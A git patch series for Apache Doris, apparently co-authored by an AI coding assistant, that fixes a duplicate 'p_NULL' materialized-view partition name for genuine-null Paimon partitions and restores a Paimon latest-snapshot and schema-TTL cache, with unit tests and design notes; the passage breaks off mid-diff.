=?UTF-8?q?fix:=20FIX-3=20(CI=20973411)=20?= =?UTF-8?q?=E2=80=94=20distinct=20MTMV=20name=20for=20genuine-null=20parti?= =?UTF-8?q?tion=20(no=20p=5FNULL=20dup)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - root cause: on the paimon null_partition table (genuine NULL + string 'null' + string 'NULL' + 'bj'), the branch's IS-NULL-prune fix marks a genuine-null partition isNull=true, so PartitionInfo.toPartitionValue renders it as the bare keyword "NULL" -> MTMV partition name "p_NULL", colliding with the literal string 'NULL' partition (also p_NULL) -> "Duplicated named partition: p_NULL" on CREATE MATERIALIZED VIEW partition by(region). Master kept isNull=false so genuine-null got a distinct name. - solution: ListPartitionItem.toPartitionKeyDesc (both overloads) now substitutes the key's originHiveKeys sentinel (e.g. __HIVE_DEFAULT_PARTITION__) as the DISPLAY value for a genuine-null partition while keeping isNull=true. getValue() stays a NullLiteral so IS NULL pruning is unaffected; only the rendered name changes -> genuine-null becomes p_HIVEDEFAULTPARTITION (distinct). Connector-agnostic; MTMV-only blast radius (OLAP partitions have empty originHiveKeys -> no-op). Also closes the same latent collision for hive. - tests: new ListPartitionItemTest (genuine-null vs string-'NULL' produce distinct names and the null key still resolves to a NullLiteral; OLAP null partition unaffected). The RED run reproduced "expected: not equal but was: ". 2/2 GREEN; MTMVPartitionUtilTest 10/10 (no regression); fe-core checkstyle clean. Co-Authored-By: Claude Opus 4.8 (1M context) Claude-Session: https://claude.ai/code/session_011mTrPcvMZtFjsxWJM5TRnG --- .../doris/catalog/ListPartitionItem.java | 32 +++++- .../doris/catalog/ListPartitionItemTest.java | 100 ++++++++++++++++++ .../fix-973411-3-pnull-partition-design.md | 55 ++++++++++ .../fix-973411-3-pnull-partition-summary.md | 27 +++++ plan-doc/task-list.md | 2 +- 5 files changed, 211 insertions(+), 5 deletions(-) create mode 100644 fe/fe-core/src/test/java/org/apache/doris/catalog/ListPartitionItemTest.java create mode 100644 plan-doc/fix-973411-3-pnull-partition-design.md create mode 100644 plan-doc/fix-973411-3-pnull-partition-summary.md diff --git a/fe/fe-core/src/main/java/org/apache/doris/catalog/ListPartitionItem.java b/fe/fe-core/src/main/java/org/apache/doris/catalog/ListPartitionItem.java index cccd1bcbc508f0..22b6e457744dd1 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/catalog/ListPartitionItem.java +++ b/fe/fe-core/src/main/java/org/apache/doris/catalog/ListPartitionItem.java @@ -82,17 +82,16 @@ public PartitionItem getIntersect(PartitionItem newItem) { @Override public PartitionKeyDesc toPartitionKeyDesc() { - List> inValues = partitionKeys.stream().map(PartitionInfo::toPartitionValue) + List> inValues = partitionKeys.stream().map(ListPartitionItem::toDisplayPartitionValues) .collect(Collectors.toList()); return PartitionKeyDesc.createIn(inValues); } @Override public PartitionKeyDesc toPartitionKeyDesc(int pos) throws AnalysisException { - List> inValues = partitionKeys.stream().map(PartitionInfo::toPartitionValue) - .collect(Collectors.toList()); Set> res = Sets.newHashSet(); - for (List values : inValues) { + for (PartitionKey partitionKey : partitionKeys) { + List values = toDisplayPartitionValues(partitionKey); if (values.size() <= pos) { throw new AnalysisException( String.format("toPartitionKeyDesc IndexOutOfBounds, values: %s, pos: %d", values.toString(), @@ -103,6 +102,31 @@ public PartitionKeyDesc toPartitionKeyDesc(int pos) throws AnalysisException { return PartitionKeyDesc.createIn(Lists.newArrayList(res)); } + /** + * Like {@link PartitionInfo#toPartitionValue} but, for a genuine-NULL partition value whose key carries a + * sized {@code originHiveKeys} (set by connectors that render NULL via a sentinel, e.g. paimon's + * partition.default-name normalized to Doris's {@code __HIVE_DEFAULT_PARTITION__}), uses that sentinel + * string as the DISPLAY value. The value stays {@code isNull=true}, so {@code getValue(type)} is still a + * {@link org.apache.doris.analysis.NullLiteral} and partition pruning / {@code col IS NULL} are unaffected; + * only the rendered partition name differs. This gives a genuine-NULL partition a DISTINCT MTMV name + * (e.g. {@code p_HIVEDEFAULTPARTITION}) instead of {@code p_NULL}, which would otherwise collide with a + * literal string {@code 'NULL'} partition (CI 973411 test_paimon_mtmv "Duplicated named partition: p_NULL"). + * For internal OLAP partitions {@code originHiveKeys} is empty, so this is a no-op. + */ + private static List toDisplayPartitionValues(PartitionKey partitionKey) { + List values = PartitionInfo.toPartitionValue(partitionKey); + List originHiveKeys = partitionKey.getOriginHiveKeys(); + if (originHiveKeys.size() != partitionKey.getKeys().size()) { + return values; + } + for (int i = 0; i < values.size(); i++) { + if (values.get(i).isNullPartition()) { + values.set(i, new PartitionValue(originHiveKeys.get(i), true)); + } + } + return values; + } + @Override public boolean isGreaterThanSpecifiedTime(int pos, Optional dateFormatOptional, long nowTruncSubSec) throws AnalysisException { diff --git a/fe/fe-core/src/test/java/org/apache/doris/catalog/ListPartitionItemTest.java b/fe/fe-core/src/test/java/org/apache/doris/catalog/ListPartitionItemTest.java new file mode 100644 index 00000000000000..9f56dc2921eec6 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/catalog/ListPartitionItemTest.java @@ -0,0 +1,100 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.catalog; + +import org.apache.doris.analysis.PartitionValue; +import org.apache.doris.common.AnalysisException; +import org.apache.doris.datasource.TablePartitionValues; +import org.apache.doris.mtmv.MTMVPartitionUtil; + +import com.google.common.collect.Lists; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.List; + +/** + * Tests for {@link ListPartitionItem#toPartitionKeyDesc} null-partition display handling (FIX-3, CI 973411). + */ +public class ListPartitionItemTest { + + /** + * A genuine-NULL partition (connector renders it via the {@code __HIVE_DEFAULT_PARTITION__} sentinel and + * marks the key isNull) and a literal string {@code 'NULL'} partition must produce DISTINCT MTMV partition + * names. Before FIX-3 both rendered to the bare {@code NULL} keyword -> both named {@code p_NULL} -> + * "Duplicated named partition: p_NULL" (CI 973411 test_paimon_mtmv on the paimon null_partition table, + * which has rows for genuine NULL, 'null' and 'NULL'). The genuine-null key must keep isNull=true so + * {@code region IS NULL} still prunes to it (the IS-NULL-prune fix is preserved); only the DISPLAY name + * changes. + */ + @Test + public void testNullPartitionGetsDistinctNameButStaysNull() throws AnalysisException { + List types = Collections.singletonList(Type.VARCHAR); + + // Genuine NULL partition as a paimon/hive connector builds it: a NULL literal whose origin-hive key + // preserves the canonical sentinel string. + PartitionKey nullKey = PartitionKey.createListPartitionKeyWithTypes( + Collections.singletonList(new PartitionValue(TablePartitionValues.HIVE_DEFAULT_PARTITION, true)), + types, true); + // A literal string 'NULL' partition value (NOT a genuine null). + PartitionKey stringNullKey = PartitionKey.createListPartitionKeyWithTypes( + Collections.singletonList(new PartitionValue("NULL", false)), types, true); + + ListPartitionItem nullItem = new ListPartitionItem(Lists.newArrayList(nullKey)); + ListPartitionItem stringNullItem = new ListPartitionItem(Lists.newArrayList(stringNullKey)); + + String nullName = MTMVPartitionUtil.generatePartitionName(nullItem.toPartitionKeyDesc(0)); + String stringNullName = MTMVPartitionUtil.generatePartitionName(stringNullItem.toPartitionKeyDesc(0)); + + // MUTATION: reverting toPartitionKeyDesc to render the null value as the bare "NULL" keyword makes + // both names "p_NULL" -> this assertion (and the CREATE MTMV) red. + Assertions.assertNotEquals(nullName, stringNullName, + "genuine-null and string-'NULL' partitions must produce distinct MTMV names"); + Assertions.assertEquals("p_NULL", stringNullName, + "the literal string 'NULL' partition must stay p_NULL"); + Assertions.assertEquals("p_HIVEDEFAULTPARTITION", nullName, + "the genuine-null partition must be named from the sentinel, not the bare NULL keyword"); + + // The null partition's desc value must still resolve to a NULL literal so `col IS NULL` prunes to it. + // MUTATION: dropping isNull on the substituted display value -> getValue is a non-null literal -> red. + PartitionValue nullDescValue = nullItem.toPartitionKeyDesc(0).getInValues().get(0).get(0); + Assertions.assertTrue(nullDescValue.isNullPartition(), + "the null partition desc value must stay isNull"); + Assertions.assertTrue(nullDescValue.getValue(Type.VARCHAR).isNullLiteral(), + "the null partition must still resolve to a NULL literal (IS NULL prune preserved)"); + } + + /** + * Internal OLAP list partitions carry NO originHiveKeys, so the FIX-3 display substitution is a no-op: + * a genuine NULL OLAP partition value keeps rendering as the bare {@code NULL} keyword (p_NULL). + */ + @Test + public void testOlapNullPartitionUnchanged() throws AnalysisException { + List types = Collections.singletonList(Type.VARCHAR); + // isHive=false -> originHiveKeys stays empty -> guard skips -> legacy behavior. + PartitionKey olapNullKey = PartitionKey.createListPartitionKeyWithTypes( + Collections.singletonList(new PartitionValue("NULL", true)), types, false); + ListPartitionItem item = new ListPartitionItem(Lists.newArrayList(olapNullKey)); + // MUTATION: applying the sentinel substitution unconditionally (ignoring the originHiveKeys guard) + // would change this to p_HIVEDEFAULTPARTITION -> red. + Assertions.assertEquals("p_NULL", + MTMVPartitionUtil.generatePartitionName(item.toPartitionKeyDesc(0)), + "an OLAP null partition (no originHiveKeys) must be unaffected by the FIX-3 substitution"); + } +} diff --git a/plan-doc/fix-973411-3-pnull-partition-design.md b/plan-doc/fix-973411-3-pnull-partition-design.md new file mode 100644 index 00000000000000..e59b9dcc7a6dc8 --- /dev/null +++ b/plan-doc/fix-973411-3-pnull-partition-design.md @@ -0,0 +1,55 @@ +# FIX-3 — test_paimon_mtmv: "Duplicated named partition: p_NULL" + +## Problem +CI 973411 `mtmv_p0/test_paimon_mtmv.groovy:247`: `CREATE MATERIALIZED VIEW ... partition by(region) AS SELECT +* FROM .test_paimon_spark.null_partition` fails: `Duplicated named partition: p_NULL`. + +## Root Cause +`null_partition` (docker run01.sql:63-67) region values: `bj`, genuine NULL, string `'null'`, string `'NULL'`. +MTMV names one partition per distinct base PartitionKeyDesc via `MTMVPartitionUtil.generatePartitionName`: +`"p_" + desc.toSql()` with `[^a-zA-Z0-9,]` stripped. Two partitions collapse to `p_NULL`: +- genuine NULL: connector normalizes paimon's `__DEFAULT_PARTITION__` → `__HIVE_DEFAULT_PARTITION__` + (PaimonConnectorMetadata:1001-1008), bridge marks it `isNull=true` (PluginDrivenMvccExternalTable:193-194) + → PartitionKey holds a `NullLiteral`. `PartitionInfo.toPartitionValue` maps a `NullLiteral` → + `new PartitionValue("NULL", true)` (PartitionInfo.java:401-402) → `desc.toSql()` = `('NULL')` → `p_NULL`. +- string `'NULL'`: `isNull=false`, getStringValue()="NULL" → `('NULL')` → `p_NULL`. IDENTICAL. + +Master (`PaimonUtil.toListPartitionItem:214`) hardcoded `isNull=false`, so genuine-NULL was a *StringLiteral* of +the sentinel → a DISTINCT name → no collision (test passed; .out / comment line 265 "Will lose null data"). +The branch's IS-NULL-prune fix (isNull=true) introduced the collision. Classification: **SPI regression**. + +## Design +Keep `isNull=true` (so `region IS NULL` prune from the prune fix still works) but stop the MTMV name from +collapsing a genuine-null to the bare `NULL` that collides with a literal string `'NULL'`. The bridge already +preserves a distinct display string in `PartitionKey.originHiveKeys` ("__HIVE_DEFAULT_PARTITION__", because it +builds the key with `createListPartitionKeyWithTypes(..., isHive=true)`). In +`ListPartitionItem.toPartitionKeyDesc`, for a null partition value whose key carries a sized `originHiveKeys`, +use that origin string as the DISPLAY value (`new PartitionValue(originKey, true)`); `isNull` stays true so +`getValue(type)` is still a `NullLiteral` (pruning unaffected) but `PartitionKeyDesc.toSql()` renders the +distinct sentinel via `getStringValue()`. Result: genuine-NULL → `p_HIVEDEFAULTPARTITION` (distinct, not +asserted), `'NULL'`→`p_NULL`, `'null'`→`p_null`, `'bj'`→`p_bj`. No duplicate. Also closes the same latent +collision for Hive (TablePartitionValues marks `__HIVE_DEFAULT_PARTITION__` isNull=true identically). + +Connector-agnostic (no source-specific code); fix is at the generic catalog layer. Blast radius = MTMV only: +the only `toPartitionKeyDesc` callers are MTMV generators; MTMV's own OLAP partitions have empty +`originHiveKeys` so the guard is a no-op for them. + +## Implementation Plan +`fe/fe-core/.../catalog/ListPartitionItem.java`: rewrite `toPartitionKeyDesc(int pos)` and the no-arg overload +to substitute the origin-hive-key display string for a null partition value (a private helper +`nullDisplayValue(PartitionKey, List, int)`), keeping the existing `pos`-bounds AnalysisException. + +## Risk Analysis +Low. `getOriginHiveKeys()` is a plain getter (empty for OLAP → guard skips). `isNull` unchanged → no prune +regression. `PartitionInfo.toPartitionValue` (shared with Range/SHOW-CREATE/internal-OLAP) is NOT touched. + +## Test Plan +### Unit Tests +New FE UT (e.g. `ListPartitionItemTest`): build a null PartitionKey via +`createListPartitionKeyWithTypes([PartitionValue("__HIVE_DEFAULT_PARTITION__", true)], [VARCHAR], true)` and a +string PartitionKey for "NULL"; assert `generatePartitionName(toPartitionKeyDesc(0))` differs between them and +that the null key's `getValue(STRING)` is still a NullLiteral. RED before / GREEN after. + +### E2E Tests +Existing `test_paimon_mtmv.groovy` under docker enablePaimonTest=true (currently RED, expected GREEN). Also +re-verify `test_paimon_runtime_filter_partition_pruning` (IS NULL prune) stays GREEN. diff --git a/plan-doc/fix-973411-3-pnull-partition-summary.md b/plan-doc/fix-973411-3-pnull-partition-summary.md new file mode 100644 index 00000000000000..49e5161c8b2302 --- /dev/null +++ b/plan-doc/fix-973411-3-pnull-partition-summary.md @@ -0,0 +1,27 @@ +# FIX-3 Summary — "Duplicated named partition: p_NULL" + +## Problem +CI 973411 `test_paimon_mtmv:247`: CREATE MV partitioned by `region` over paimon `null_partition` failed with +`Duplicated named partition: p_NULL`. + +## Root Cause +`null_partition` has genuine NULL, string `'null'`, string `'NULL'`, `'bj'`. The branch's IS-NULL-prune fix +marks a genuine-null partition `isNull=true` → `PartitionInfo.toPartitionValue` renders it as the bare keyword +`NULL` → MTMV name `p_NULL`, colliding with the literal string `'NULL'` partition (also `p_NULL`). Master kept +`isNull=false` so genuine-null got a distinct name. SPI regression. + +## Fix +`ListPartitionItem.toPartitionKeyDesc` (both overloads): a new `toDisplayPartitionValues` helper substitutes the +key's `originHiveKeys` sentinel string (e.g. `__HIVE_DEFAULT_PARTITION__`) as the DISPLAY value for a +genuine-null partition, keeping `isNull=true`. The literal stays a `NullLiteral` (IS NULL prune unaffected); only +the rendered name changes → genuine-null becomes `p_HIVEDEFAULTPARTITION` (distinct), no collision. Connector- +agnostic; MTMV-only blast radius (OLAP partitions have empty originHiveKeys → no-op). + +## Tests +New `ListPartitionItemTest`: (1) genuine-null vs string-'NULL' produce distinct names AND the null key still +resolves to a NullLiteral (RED reproduced `expected: not equal but was: `); (2) OLAP null partition +unchanged (no-op guard). 2/2 GREEN; MTMVPartitionUtilTest 10/10 (no regression); fe-core checkstyle clean. + +## Result +Fixed (offline UT reproduces + verifies). Real gate: docker enablePaimonTest=true rerun of test_paimon_mtmv; +also re-verify test_paimon_runtime_filter_partition_pruning (IS NULL prune) stays GREEN. diff --git a/plan-doc/task-list.md b/plan-doc/task-list.md index a6a1c8b46223c2..fafe57100e26d3 100644 --- a/plan-doc/task-list.md +++ b/plan-doc/task-list.md @@ -5,7 +5,7 @@ Build 973411, HEAD e1d6f88. All 4 test files are byte-identical to master ⇒ al - [x] FIX-1 — test_create_paimon_table: paimon-over-HMS create-db classloader split (PaimonCatalogFactory.assembleHiveConf) — DONE (16/16 UT, checkstyle clean) - [x] FIX-2 — test_mysql_mtmv: connector-null NPE during mv_infos scan (PluginDrivenMvccExternalTable.materializeLatest) — DONE (36/36 UT, RED reproduced exact NPE, checkstyle clean) -- [ ] FIX-3 — test_paimon_mtmv: Duplicated p_NULL partition naming (ListPartitionItem.toPartitionKeyDesc) +- [x] FIX-3 — test_paimon_mtmv: Duplicated p_NULL partition naming (ListPartitionItem.toPartitionKeyDesc) — DONE (2/2 new UT + MTMV 10/10, RED reproduced p_NULL collision, checkstyle clean) - [ ] FIX-4 — test_paimon_table_meta_cache: restore paimon table snapshot cache (PaimonConnector + Connector SPI + fe-core refresh wiring) Order: 1 → 2 → 3 → 4 (smallest/lightest module first; #4 largest). TDD per fix, independent commit each. From f6d08902bb34070125b44737a88dd87fd6057dac Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 20 Jun 2026 04:55:24 +0800 Subject: [PATCH 126/128] =?UTF-8?q?fix:=20FIX-4=20(CI=20973411)=20?= =?UTF-8?q?=E2=80=94=20restore=20paimon=20table=20cache=20(data=20snapshot?= =?UTF-8?q?=20+=20schema=20TTL)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The SPI migration split the legacy single meta.cache.paimon.table.ttl-second knob (which covered BOTH the data snapshot AND the schema) and dropped the data cache, so test_paimon_table_meta_cache failed on two assertions: the with-cache catalog saw an external INSERT immediately (data), and the no-cache catalog served stale schema. Axis A (data snapshot): - new PaimonLatestSnapshotCache on the per-catalog PaimonConnector: TTL cache of the latest snapshot id keyed by Identifier(db,table), sized by meta.cache.paimon.table.ttl-second (legacy default 86400; <=0 disables -> always live = the no-cache catalog), access-based expiry. Injected into PaimonConnectorMetadata (new 5-arg ctor; the 3/4-arg ctors get a disabled cache so existing direct-construction tests are unchanged). - beginQuerySnapshot serves the id through the cache (live read only on a miss). The pinned id reaches the scan via applySnapshot -> scan.snapshot-id -> resolveScanTable Table.copy, so an external write after the pin is invisible until expiry/refresh. - new Connector.invalidateTable/invalidateAll SPI default no-ops; PaimonConnector overrides them; RefreshManager.refreshTableInternal invalidates any PluginDrivenExternalCatalog's connector (keyed by REMOTE names). REFRESH CATALOG already rebuilds the connector. Axis B (schema TTL): - new Connector.schemaCacheTtlSecondOverride() SPI default empty; PaimonConnector returns meta.cache.paimon.table.ttl-second when set. - new generic ExternalCatalog.overlayMetaCacheConfig hook (no-op); PluginDrivenExternalCatalog overrides it to set schema.cache.ttl-second from the connector override (user value wins); ExternalMetaCacheMgr.findCatalogProperties applies it to its EPHEMERAL property copy (no SHOW CREATE leak). REFRESH TABLE already invalidates the schema cache entry. So the no-cache catalog (ttl-second=0) serves fresh schema. fe-core stays connector-agnostic (virtual dispatch; base no-ops). ttl-second removed from the PaimonConnectorProvider "dead keys" warning (it again takes effect); enable/capacity remain not-wired (still reported ignored). tests: PaimonLatestSnapshotCacheTest 5/5 (cache within TTL / ttl=0 bypass / invalidate / expiry via injected clock), PaimonConnectorCacheTest 4/4 (schemaCacheTtlSecondOverride mapping); regression PaimonConnectorMetadataMvccTest 40/40, ValidateProperties 14/14, fe-core compiles + PluginDrivenMvccExternalTableTest 36/36 + ListPartitionItemTest 2/2; checkstyle clean across the 3 touched modules. Cross-query data cache + schema TTL + refresh are gated by the docker e2e (enablePaimonTest=true rerun of test_paimon_table_meta_cache). Co-Authored-By: Claude Opus 4.8 (1M context) Claude-Session: https://claude.ai/code/session_011mTrPcvMZtFjsxWJM5TRnG --- .../apache/doris/connector/api/Connector.java | 25 ++++ .../connector/paimon/PaimonConnector.java | 70 +++++++++- .../paimon/PaimonConnectorMetadata.java | 22 ++- .../paimon/PaimonConnectorProvider.java | 12 +- .../paimon/PaimonLatestSnapshotCache.java | 117 ++++++++++++++++ .../paimon/PaimonConnectorCacheTest.java | 73 ++++++++++ .../paimon/PaimonLatestSnapshotCacheTest.java | 130 ++++++++++++++++++ .../apache/doris/catalog/RefreshManager.java | 8 ++ .../doris/datasource/ExternalCatalog.java | 10 ++ .../datasource/ExternalMetaCacheMgr.java | 12 +- .../PluginDrivenExternalCatalog.java | 24 ++++ .../fix-973411-4-paimon-meta-cache-design.md | 63 +++++++++ .../fix-973411-4-paimon-meta-cache-summary.md | 32 +++++ plan-doc/task-list.md | 2 +- 14 files changed, 588 insertions(+), 12 deletions(-) create mode 100644 fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonLatestSnapshotCache.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorCacheTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonLatestSnapshotCacheTest.java create mode 100644 plan-doc/fix-973411-4-paimon-meta-cache-design.md create mode 100644 plan-doc/fix-973411-4-paimon-meta-cache-summary.md diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/Connector.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/Connector.java index d53eaa9030dd79..a3c8eafa415dbd 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/Connector.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/Connector.java @@ -24,6 +24,7 @@ import java.io.IOException; import java.util.Collections; import java.util.List; +import java.util.OptionalLong; import java.util.Set; /** @@ -127,4 +128,28 @@ default void close() throws IOException { default String executeRestRequest(String path, String body) { throw new UnsupportedOperationException("REST passthrough not supported by this connector"); } + + /** + * Invalidates any connector-side per-table cache (e.g. a latest-snapshot/version cache) so a subsequent + * read reflects the latest external state. Called by the engine on {@code REFRESH TABLE}. The names are + * the REMOTE db/table names (as seen by the connector). Default no-op for connectors that cache nothing. + */ + default void invalidateTable(String dbName, String tableName) { + } + + /** Invalidates all connector-side per-table caches. Default no-op. */ + default void invalidateAll() { + } + + /** + * Optional per-connector override of the catalog's schema-cache TTL (in seconds), consulted generically by + * the engine when sizing the schema meta-cache. Semantics match {@code schema.cache.ttl-second}: + * {@code 0} disables schema caching (always read fresh), {@code -1} = no expiration, {@code > 0} = TTL. + * Lets a connector make its own cache knob also govern schema freshness (e.g. paimon's + * {@code meta.cache.paimon.table.ttl-second}, which legacy used for the whole table cache). An explicit + * user {@code schema.cache.ttl-second} always wins over this. Default: no override. + */ + default OptionalLong schemaCacheTtlSecondOverride() { + return OptionalLong.empty(); + } } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index c0229e87f10c2e..747e8b13c449d5 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -38,6 +38,7 @@ import org.apache.paimon.catalog.Catalog; import org.apache.paimon.catalog.CatalogContext; import org.apache.paimon.catalog.CatalogFactory; +import org.apache.paimon.catalog.Identifier; import org.apache.paimon.options.Options; import java.io.IOException; @@ -48,6 +49,7 @@ import java.util.EnumSet; import java.util.HashMap; import java.util.Map; +import java.util.OptionalLong; import java.util.Set; import java.util.concurrent.ConcurrentHashMap; @@ -81,10 +83,27 @@ public class PaimonConnector implements Connector { private static final Map DRIVER_CLASS_LOADER_CACHE = new ConcurrentHashMap<>(); private static final Set REGISTERED_DRIVER_KEYS = ConcurrentHashMap.newKeySet(); + // FIX-4 (CI 973411): the legacy paimon table cache (meta.cache.paimon.table.*) governed BOTH the data + // snapshot AND the schema; the SPI cutover dropped it (marked the keys dead). meta.cache.paimon.table.ttl-second + // is restored here: it sizes the latest-snapshot cache below (data) AND, via schemaCacheTtlSecondOverride(), + // the generic schema cache (schema). enable/capacity remain best-effort (capacity uses the legacy default). + static final String TABLE_CACHE_TTL_SECOND = "meta.cache.paimon.table.ttl-second"; + // Legacy default = Config.external_cache_expire_time_seconds_after_access (24h); the connector is isolated + // from fe-core Config, so the legacy default is mirrored here (an explicit ttl-second always overrides it). + static final long DEFAULT_TABLE_CACHE_TTL_SECOND = 86400L; + // Legacy default = Config.max_external_table_cache_num. + static final int DEFAULT_TABLE_CACHE_CAPACITY = 1000; + private final Map properties; private final ConnectorContext context; private volatile Catalog catalog; + // FIX-4: per-catalog (long-lived) cache of each table's latest snapshot id, sized by + // meta.cache.paimon.table.ttl-second (<=0 disables -> always live, the no-cache catalog). getMetadata() + // returns a fresh metadata per query, so this lives on the connector and is injected into the metadata so + // beginQuerySnapshot pins a stable id across queries. Cleared wholesale on REFRESH CATALOG (connector rebuilt). + private final PaimonLatestSnapshotCache latestSnapshotCache; + // FIX-B-MC2: connector-level (per-catalog, long-lived) second-level memo for the time-travel // schema-at-snapshot read. getMetadata() returns a FRESH metadata per query, so this must live on the // connector (not the metadata) to give the cross-query hit the legacy PaimonExternalMetaCache provided. @@ -94,13 +113,62 @@ public class PaimonConnector implements Connector { public PaimonConnector(Map properties, ConnectorContext context) { this.properties = properties; this.context = context; + this.latestSnapshotCache = + new PaimonLatestSnapshotCache(resolveTableCacheTtlSecond(properties), DEFAULT_TABLE_CACHE_CAPACITY); + } + + /** + * Parses {@code meta.cache.paimon.table.ttl-second} (legacy default 24h; {@code <= 0} disables caching -> + * the no-cache catalog reads live). An unparseable value falls back to the default rather than failing + * catalog creation (validation of the knob is best-effort; the legacy CacheSpec check was dropped at cutover). + */ + private static long resolveTableCacheTtlSecond(Map properties) { + String raw = properties.get(TABLE_CACHE_TTL_SECOND); + if (raw == null || raw.trim().isEmpty()) { + return DEFAULT_TABLE_CACHE_TTL_SECOND; + } + try { + return Long.parseLong(raw.trim()); + } catch (NumberFormatException e) { + LOG.warn("Invalid {}={}, falling back to default {}s", + TABLE_CACHE_TTL_SECOND, raw, DEFAULT_TABLE_CACHE_TTL_SECOND); + return DEFAULT_TABLE_CACHE_TTL_SECOND; + } } @Override public ConnectorMetadata getMetadata(ConnectorSession session) { return new PaimonConnectorMetadata( new PaimonCatalogOps.CatalogBackedPaimonCatalogOps(ensureCatalog()), properties, context, - schemaAtMemo); + schemaAtMemo, latestSnapshotCache); + } + + @Override + public void invalidateTable(String dbName, String tableName) { + // REFRESH TABLE: drop the cached latest snapshot id so the next read goes live. Keyed by the REMOTE + // db/table names, matching the key beginQuerySnapshot stores (PaimonTableHandle carries remote names). + latestSnapshotCache.invalidate(Identifier.create(dbName, tableName)); + } + + @Override + public void invalidateAll() { + latestSnapshotCache.invalidateAll(); + } + + @Override + public OptionalLong schemaCacheTtlSecondOverride() { + // Restore the legacy single-knob semantics: meta.cache.paimon.table.ttl-second also governs the schema + // cache (the SPI routes paimon schema to the generic schema cache keyed by schema.cache.ttl-second). So + // the no-cache catalog (ttl-second=0) serves FRESH schema. Absent -> no override (engine default TTL). + String raw = properties.get(TABLE_CACHE_TTL_SECOND); + if (raw == null || raw.trim().isEmpty()) { + return OptionalLong.empty(); + } + try { + return OptionalLong.of(Long.parseLong(raw.trim())); + } catch (NumberFormatException e) { + return OptionalLong.empty(); + } } @Override diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java index 18141f5465393e..ab35fc3a28c9b3 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java @@ -89,6 +89,12 @@ public class PaimonConnectorMetadata implements ConnectorMetadata { // sites compile unchanged; production goes through the 4-arg ctor with the connector-shared memo. private final PaimonSchemaAtMemo schemaAtMemo; + // FIX-4: per-catalog latest-snapshot-id cache (injected by PaimonConnector, the long-lived owner) so the + // query-begin pin serves a STABLE snapshot id across queries within the TTL (restores the legacy table + // cache). The 3-arg / 4-arg ctors give each metadata its OWN disabled cache (ttl<=0 => always live) so the + // existing direct-construction tests compile unchanged; production goes through the 5-arg ctor. + private final PaimonLatestSnapshotCache latestSnapshotCache; + public PaimonConnectorMetadata(PaimonCatalogOps catalogOps, Map properties, ConnectorContext context) { this(catalogOps, properties, context, new PaimonSchemaAtMemo(PaimonSchemaAtMemo.DEFAULT_MAX_SIZE)); @@ -96,11 +102,18 @@ public PaimonConnectorMetadata(PaimonCatalogOps catalogOps, Map PaimonConnectorMetadata(PaimonCatalogOps catalogOps, Map properties, ConnectorContext context, PaimonSchemaAtMemo schemaAtMemo) { + this(catalogOps, properties, context, schemaAtMemo, new PaimonLatestSnapshotCache(0L, 1)); + } + + PaimonConnectorMetadata(PaimonCatalogOps catalogOps, Map properties, + ConnectorContext context, PaimonSchemaAtMemo schemaAtMemo, + PaimonLatestSnapshotCache latestSnapshotCache) { this.catalogOps = catalogOps; this.typeMappingOptions = buildTypeMappingOptions(properties); this.context = context; this.catalogProperties = properties; this.schemaAtMemo = schemaAtMemo; + this.latestSnapshotCache = latestSnapshotCache; } @Override @@ -401,8 +414,13 @@ public Optional beginQuerySnapshot( if (paimonHandle.isSystemTable()) { return Optional.empty(); } - Table table = resolveTable(paimonHandle); - long id = catalogOps.latestSnapshotId(table).orElse(-1L); + // FIX-4: serve the latest snapshot id through the per-catalog cache so the with-cache catalog pins a + // STABLE id across queries (an external write made after the pin is invisible until the entry expires + // or REFRESH TABLE/CATALOG invalidates it). The live read (resolveTable + latestSnapshotId) runs only + // on a miss; when caching is disabled (ttl-second<=0, the no-cache catalog) it runs every call. + Identifier identifier = Identifier.create(paimonHandle.getDatabaseName(), paimonHandle.getTableName()); + long id = latestSnapshotCache.getOrLoad(identifier, + () -> catalogOps.latestSnapshotId(resolveTable(paimonHandle)).orElse(-1L)); return Optional.of(ConnectorMvccSnapshot.builder().snapshotId(id).build()); } diff --git 